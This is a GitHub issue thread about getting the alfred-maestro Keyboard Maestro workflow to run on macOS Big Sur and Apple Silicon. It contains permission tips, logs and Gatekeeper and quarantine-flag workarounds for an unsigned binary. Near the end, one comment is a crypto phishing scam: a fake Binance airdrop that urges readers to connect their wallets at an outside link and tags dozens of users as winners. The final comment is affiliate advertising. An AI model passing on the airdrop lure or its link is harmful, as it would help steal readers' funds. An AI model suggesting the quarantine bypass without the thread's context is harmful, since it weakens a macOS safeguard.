### ISSUE TITLE
Big Sur

### ISSUE THREAD

**Issue by fatlazycat** [iansinnott/alfred-maestro#26]
Hi, anyone got this working in Big Sur at all ?

Have it working in Catalina following the advice in #25 but no luck with Big Sur.

Is it broken or just more macOS permission issues ?

Thanks

**Comment by iansinnott** [comment]
I'm still using this macro on a daily basis and everything is working great with the latest KM version. I'm still running on Catalina so I suspect it's a macOS issue.

**Comment by taylornd** [comment]
I can get it to run but not find any of the macros in KM...

**Comment by fatlazycat** [comment]
@taylornd yeah that's where I get to as well

**Comment by timlawson-uk** [comment]
Any news on this using Big Sur? Keen to try it but have already upgraded so no going back!

**Comment by nikitavoloboev** [comment]
I use it on Bug Sur, no issues.

**Comment by taylornd** [comment]
> I use it on Bug Sur, no issues.

Really? Have you changed anything or done anything to get it to work? I did a fresh install of everything and can get it to run but it doesn't find any macros...

**Comment by nikitavoloboev** [comment]
Check if you have these permissions:

<img width="586" alt="image" src="https://user-images.githubusercontent.com/6391776/101331360-2ac75380-3874-11eb-888c-426817cb5c91.png">


Specifically KM permission to access Alfred 4.

If you don't see anything there, not sure how to manually add the permission.

**Comment by timlawson-uk** [comment]
It is working fine! Many thanks.

**Comment by taylornd** [comment]
> Check if you have these permissions:
> 
> <img alt="image" width="586" src="https://user-images.githubusercontent.com/6391776/101331360-2ac75380-3874-11eb-888c-426817cb5c91.png">
> 
> Specifically KM permission to access Alfred 4.
> 
> If you don't see anything there, not sure how to manually add the permission.

Interesting - I have Alfred to KM but not the other way around - anyone have any ideas on how to add..
<img width="639" alt="Screenshot 2020-12-07 at 10 21 06" src="https://user-images.githubusercontent.com/3984615/101339210-053b4980-3876-11eb-855a-06be0399962e.png">

**Comment by taylornd** [comment]
Added Alfred but still not finding any macros

<img width="643" alt="Screenshot 2020-12-07 at 11 47 07" src="https://user-images.githubusercontent.com/3984615/101347399-f064b300-3881-11eb-9432-283fef4f142f.png">

**Comment by nikitavoloboev** [comment]
Can you share logs what happens when you search for macros?

```
[13:33:04.052] STDERR: Alfred Maestro[Script Filter] 🍺
13:33:03 workflow.go:307: ------- Alfred Maestro/0.2.2 (AwGo/0.17.0) -------
13:33:03 files.go:66: [ERROR] delete tempfile "~/Library/Caches/com.runningwithcrayons.Alfred/Workflow Data/iansinnott.keyboardmaestro/kmMacros699047446": remove /Users/nikivi/Library/Caches/com.runningwithcrayons.Alfred/Workflow Data/iansinnott.keyboardmaestro/kmMacros699047446: no such file or directory
13:33:03 feedback.go:441: Sent 572 result(s) to Alfred
```

Is what I get.

**Comment by taylornd** [comment]
> Can you share logs what happens when you search for macros?
> 
> ```
> [13:33:04.052] STDERR: Alfred Maestro[Script Filter] 🍺
> 13:33:03 workflow.go:307: ------- Alfred Maestro/0.2.2 (AwGo/0.17.0) -------
> 13:33:03 files.go:66: [ERROR] delete tempfile "~/Library/Caches/com.runningwithcrayons.Alfred/Workflow Data/iansinnott.keyboardmaestro/kmMacros699047446": remove /Users/nikivi/Library/Caches/com.runningwithcrayons.Alfred/Workflow Data/iansinnott.keyboardmaestro/kmMacros699047446: no such file or directory
> 13:33:03 feedback.go:441: Sent 572 result(s) to Alfred
> ```
> 
> Is what I get.

I get the below. I think it is something to do with automation permissions but I need to find a way for Alfred/KM to request them. What does your Alfred automation permissions look like? e.g. I think it needs system events

[12:55:24.733] Logging Started...
[12:55:28.038] Alfred Maestro[Script Filter] Queuing argument ''
[12:55:34.275] Alfred Maestro[Script Filter] Queuing argument 'd'
[12:55:34.480] Alfred Maestro[Script Filter] Queuing argument 'dw'
[12:55:34.617] Alfred Maestro[Script Filter] Queuing argument 'dwd'
[12:55:36.838] Alfred Maestro[Script Filter] Queuing argument 'dwdg'
[12:55:37.032] Alfred Maestro[Script Filter] Queuing argument 'dwdgo'

**Comment by nikitavoloboev** [comment]
<img width="478" alt="image" src="https://user-images.githubusercontent.com/6391776/101353838-8dc8e280-3894-11eb-82c9-7a3a7001b809.png">

**Comment by taylornd** [comment]
Any idea how to get Alfred/KM to request access to system events?

**Comment by nikitavoloboev** [comment]
Don't know but someone at https://www.alfredforum.com might know or https://forum.keyboardmaestro.com/latest

**Comment by taylornd** [comment]
I get this error: alfred_workflow_bundleid is not set, alfred_workflow_cache is not set, alfred_workflow_data is not set

**Comment by taylornd** [comment]
What is strange is that an old version of this workflow seems to work fine.

**Comment by mattbowlby** [comment]
I just installed the workflow in Big Sur and it works fine.

**Comment by taylornd** [comment]
> I just installed the workflow in Big Sur and it works fine.

do you have an M1 apple silicon machine?

**Comment by mattbowlby** [comment]
> > I just installed the workflow in Big Sur and it works fine.
> 
> do you have an M1 apple silicon machine?

No - I have a Hackintosh with an Intel i7 processor.

**Comment by almeco** [comment]
m1 mac mini here and big sur - all required permission from above set but unfortunately it does not work. Same settings under old macbook pro 15 2017 and it work flawlessly.

Any clue?

**Comment by nikitavoloboev** [comment]
> Any clue?

Perhaps try to recompile the go program yourself and run that?

**Comment by almeco** [comment]
> > Any clue?
> 
> Perhaps try to recompile the go program yourself and run that?

How?

**Comment by taylornd** [comment]
I think this is the issue - the go program doesn't work on apple silicon.

**Comment by Johannes5** [comment]
![image](https://user-images.githubusercontent.com/14299835/104765312-fdba6a80-5768-11eb-9869-43afc0dcdefe.png)

How can I make the other boxes appear?

**Comment by gitatmax** [comment]
For anyone who may still be struggling with this, what I did to fix this was to install the workflow, open Alfred preferences, right-click the Workflow, choose to view it in finder, and then right-clicked on the keyboard-maestro executable. From there, I was asked if I really wanted to open the file. Once I did that, I was able to use the workflow command `km`. It prompted one more time, but now it's working good as gold. :)

**Comment by taylornd** [comment]
Has anyone got this working with an M1 Mac?

**Comment by almeco** [comment]
> For anyone else struggling, what fixed it for me was installing the workflow, choosing Open in Finder from Alfred's preferences, and right-clicking the "keyboard-maestro" executable. Once I confirmed that I wanted to open it, I was able to run the workflow's command ("km"); it prompted me one more time, but now it's working great. :)

Damn. Does not work either for me;/

This is what I'm getting when clicking executable file:

```
exit;
panic: Invalid Workflow environment: alfred_workflow_bundleid is not set, alfred_workflow_cache is not set, alfred_workflow_data is not set

goroutine 1 [running]:
github.com/deanishe/awgo.NewFromEnv(0x0, 0x0, 0x0, 0x0, 0x0, 0x1102016)
	/Users/maltsev/dev/go/src/github.com/deanishe/awgo/workflow.go:146 +0x979
github.com/deanishe/awgo.New(...)
	/Users/maltsev/dev/go/src/github.com/deanishe/awgo/workflow.go:135
main.init.0()
	/Users/maltsev/dev/go/src/github.com/iansinnott/alfred-maestro/main.go:71 +0x38
Saving session...
...copying shared history...
...saving history...truncating history files...
...completed.
```

Any idea?

**Comment by gitatmax** [comment]
@almeco I can't confirm this now, but if I ever get my hands on an M1 I'll give it a try!

**Comment by Johannes5** [comment]
I’m using an M1 and I had the exact same issue.
After typing km, I got prompted to remove the workflow.

When executing the executable, I got the exact same message as @almeco , except that it ends with: Saving session...completed.

But now, while writing this I took another look at: 
![image](https://user-images.githubusercontent.com/14299835/109800878-0afabe00-7c1e-11eb-8882-f79bfdeb6105.png)
Turns out, **Keyboard Maestro.app was unchecked**.

**Now it works**

However I'm sure, the checkmark wasn't available when I tried to fix this a few weeks ago. I don't know what made it appear.

**Comment by taylornd** [comment]
Strange - I'm on M1 and Alfred has access to Keyboard Maestro but it still doesn't work

**Comment by jonathansplitlog** [comment]
> For anyone else struggling, what fixed it for me was installing the workflow, choosing Open in Finder from Alfred's preferences, and right-clicking the "keyboard-maestro" executable. Once I confirmed that I wanted to open it, I was able to run the workflow's command ("km"); it prompted me one more time, but now it's working great. :)

Thanks for this - got mine working on a 2015 Catalina MacBook Pro where it was previously stuck in the permission loop. If anyone makes it to this step but still has errors - try holding down `CMD` while clicking open on this executable and it should get you set up.

**Comment by stevgouws** [comment]
Mine was not working on my old 2012 Macbook running Catelina, it just wouldn't trigger anything if I used `km` in Alfred.

I fixed it by downloading `AlfredMaestro.alfredworkflow` again from this repo, then running it which opened Alfred and I just selected `Update`.

![image](https://user-images.githubusercontent.com/13498291/118485216-0d928d00-b710-11eb-82ae-75f209004f89.png)

I then tried to activate it again with `km` through Alfred,

The first time I just received this message (Notice no `Open` button): 

<img src="https://user-images.githubusercontent.com/13498291/118484743-7c231b00-b70f-11eb-9bae-e194af566990.png" width="33%" />

Then went to Security and Privacy settings and clicked `Allow Anyway`

<img src="https://user-images.githubusercontent.com/13498291/118484905-ac6ab980-b70f-11eb-9e01-ed8a53a7ba18.png" width="50%" />

Then ran it again and got this pop up and which now had an `Open` button, so clicked it

<img src="https://user-images.githubusercontent.com/13498291/118485036-cefcd280-b70f-11eb-9f30-e7fc6b152c43.png" width="33%" />

Now all working fine.

**Comment by pickerin** [comment]
Works fine for me in Monterey.  You just need to validate the binary as "safe" since the developer cannot be verified.
It's stated elsewhere in this thread, but:
1) Attempt to run it, you'll get an error that the developer cannot be verified, just click "Cancel"
2) Immediately go into System Preference > Security & Privacy > General
3) You'll see a message at the bottom of the screen, click "Allow Anyway"
4) Go back and try to run it again, this time you'll see an option to "Open", do that and it works fine.

**Comment by Khoulaiz** [comment]
If the above is not working for you (maybe you don't have the necessary admin rights since you might have a company notebook). Just clearing the quarantine flag from the workflow files (in a terminal with "xattr -d com.apple.quarantine *" in the workflow dir) solves the issue as well without admin rights.

**Comment by Tele-Pet** [comment]
> Fyi, if none of the above solutions work for you, this workflow may be a good alternative: https://www.thoughtasylum.com/alfred/alfred_conductor_for_keyboard_maestro/#download-conductor=

This worked for my new Macbook Air M2 chip that's running Ventura (13.2.1).  I did have to install Python 3, which it walked me through how to do.

**Comment by renmadigi** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @lmatosevic, @tunnckoCore, @taewookim, @sondh0127, @daoswap001, @BenSparksCode, @UbananaU, @sabatesduran, @jcurbelo, @mhaidarhanif, @1tpp, @alwayrun, @IDNK2203, @bounds, @stonega, @youfoundron, @0x-stone, @vyorkin, @katsuraZura007, @TesslaRay, @wangjc683, @rwbaumg, @yahyafakhroji, @Daniil675, @phutngo, @ltcaosj, @thesyntaxninja, @flank-code, @quietude0x, @otaldonuness

**Comment by youtextme** [comment]
When an Alfred workflow is broken or stuck: a low-risk parallel path is free Raycast on ⌥Space (keep Alfred on ⌘Space). Many launcher jobs don't need Powerpack — trial free Raycast for a week and only buy Pro (or keep Powerpack) if sync/AI/advanced features are a real weekly need.

https://raycast.com/?via=girish
Affiliate — I earn a commission if you upgrade to Pro.
